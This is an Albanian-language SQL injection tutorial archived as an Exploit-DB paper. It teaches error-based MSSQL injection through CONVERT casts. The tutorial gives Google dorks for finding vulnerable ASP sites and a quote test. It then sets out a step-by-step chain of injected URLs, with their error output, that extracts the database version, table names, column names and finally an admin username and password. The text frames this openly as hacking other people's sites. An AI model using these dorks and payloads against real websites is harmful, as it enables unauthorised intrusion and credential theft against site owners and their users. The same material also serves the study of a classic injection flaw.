[Albanian] Getting Web Data Using the MSSQL-i Method

EDB-ID:

13585

CVE:

N/A
EDB Verified:

Author:

RoAd_KiLlEr

Type:

papers
Paper:   /  

Platform:

Multiple

Published:

2010-01-07
Vulnerable App: 
==============================
MSSQL Injection Tutorial [ALB] 
==============================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Hi.I Just Visited You WebPage & I wrote this Tutorial.It shows how you can use MSSQL-i to get to the important data.I Wrote it in ALBANIAN language,so i hope that with this i can get you more Albanian visitors (HACKERS).There are lot,but they arent famous.Hope You will publish it.And Commin soon in English.Waiting for ur Reply.:P.BEst Wishes
       
check out the rest of the Windows Live . More than mail Windows Live goes way beyond your inbox. http://www.microsoft.com/windows/windowslive/

***************************************************

Ne Kete Tutorial DO Ju Tregoj Se SI te Arini Deri Tek Te Dhenat e Web-it Duke Perdorur MSSQL-i Metoden.

Ne K&#1050;t&#1050; Tutorial do t&#1050; p&#1050;rdorim k&#1050;t&#1050; lloj t&#1050; sulmit:  
"ODBC Error Message Attack with "CONVERT"


1.Njihere Duhet Te Kerkojm Faqe Qe Jan Vulnerable.
---------------------------------------------------

Per Te GJetur Faqe qe jan Vulnerable eshte shum e lehte :P.Per Kete mund ta perdorim Google :D.

Shkojm dhe e Hapim www.google.com Dhe Kerkojm me DORKS.

Si Shembull une i mora Disa.Ju Mund TE GJeni Edhe PLot Tjera.

Shkruajm psh:       inurl: "news.asp" "sub"
                    inurl: "games.asp" "id"
                    inurl: ".asp" "id"  ....etj

2. Tani Duhe ta Provojm Faqen a eshte Vulnerable per MSSQL-i.
-------------------------------------------------------------

Edhe KJo Eshte ShUm e Lehte.Kjo Behet Duke Shtuar Stringun (') Pas Id=100.

Ne Rast Se Na Pergjigjet Duke Dhene Error ,atehere e Kuptojm Se Faqeja Eshte Vulnerable.DIsa Prej Pergjigjeve
me te shpeshta jane:

++++++++++++++++++++++++++++++++++++++++++++++
ODBC Microsoft Access Driver

Unclosed quotation mark

Microsoft OLE DB Provider for Oracle

Division by zero in

Microsoft OLE DB Provider for SQL Server error '80040e14'

Dhe TE Themi se Na Eshte DHene Nje Pergjigje psh:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.

/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++

Kjo Dmth  Se Faqja Eshte Vulnerable Per Atack!!!


3.Si Ta Gjejm Versionin e Data Bazes (DB)?
------------------------------------------

Nese Webi Eshte Keshte:www.inj3ct0r.com/lajmi.asp?id=100   Atehere ja Shtojm Kete Pjese Prapa
  +or+1=convert(int,(@@version))--

Dhe Ne FUnd BEhet Keshtu:www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--

Dhe Na Jep Pergjigje:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) (VM) ' to data type int.

/msn/shared/includes/main_rub.asp, line 4    

 Dmth E Gjetem Versionin!  Tani SHkojm ME Shum :P

4.Si Te Gjejm Emrat E Tabelave apo (table_name)
------------------------------------------------

Per Te GJetur tabelat e ndonje webi nepermjet kesaj metode Shkruajme:

psh: www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--

Dhe DO Na Shfaqet nje Error psh:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Users' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Dmth E Gjetem tabelen e pare.tabela e pare eshte "Users",tani per te gjetur tabelen e radhes:

psh:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--

DHe Perseri do na shfaqet nji error i njejt dhe no na jep tabelen e dyte:

psh:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'lajmet' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Dmth Tabela e dyte eshte 'lajmet'..Dhe KEshtu Vazhdojm me radhe per Tabela Tjera

5.Si Te Zbulojm column_names (emrat e kulumnave) .
--------------------------------------------------

-Nese Duam Qe te zbulojme column_name per tabelen "Users" Pasi ketuh me se shpeshti jan userat dhe passwordat shkojme:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--

Dhe duhet te na nxjer nje error si ky:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Pra Emri i Kolumnes se pare per tabelen "Users"  eshte  "username"

Tani duhet ta gjemjm kolumnen e dyte per tabelen e njejt:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--

Dhe Na Nxjer Pergjigje (Error)

 Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'password' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene e gjetem edhe Emrin e Kolumnes se dyte.column_name eshte "password",Tani nese duam mund te vazhdojm te gjejm

column_names e radhes por kto jan 2 gjerat ma me rendesi per HACK!! :D

6.Si ti marim te dhenat qe na Interesojn psh (Username,Password,etj) :P
-------------------------------------------------------------------------

N&#1050; k&#1050;t&#1050; pjes&#1050; e t&#1050;ra q&#1050; duhet b&#1050;r&#1050; &#1050;sht&#1050; t&#1050; zeven&#1050;sojm&#1050; tabelen(table_name) dhe emrat e kolumnave(column_name) n&#1050;p&#1050;r vendet e tyre q&#1050; m&#1050; par&#1050; i kemi gjetur.

Shkojm&#1050; tani ti z&#1050;vend&#1050;sojm&#1050; psh:

www.inj3ct0r.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--

Dhe na Nxjer Pergjigje:
 Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Admin' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene se username eshte :Admin

Z&#1050;vend&#1050;sojm&#1050; tani kolumn&#1050;n e par&#1050; "username" me kolumn&#1050;n e dyt&#1050; "password":

psh:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--

Dhe Na Nxjerr:
 
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value '123456' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene Passwordi Eshte: 123456

Dhe Njejt VAzhdojm per te dhenat tjera.

Ja pra kemi arritur t&#1050; marrim disa nga info-t&#1050;, si username/pass dhe  e nj&#1050; faqe.

username: Admin
password: 123456


Besoj Se DO JU Ndihmoj Sado Pak..

Hackim Te Kendshem


*******************************************
Tuto by:**RoAd_KiLlEr**
*******************************************
Greetz to:Ton!WidnowS,Alboz-Crew, Inj3ct0r
*******************************************
WwW.inj3ct0r.com
*******************************************

----------------------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services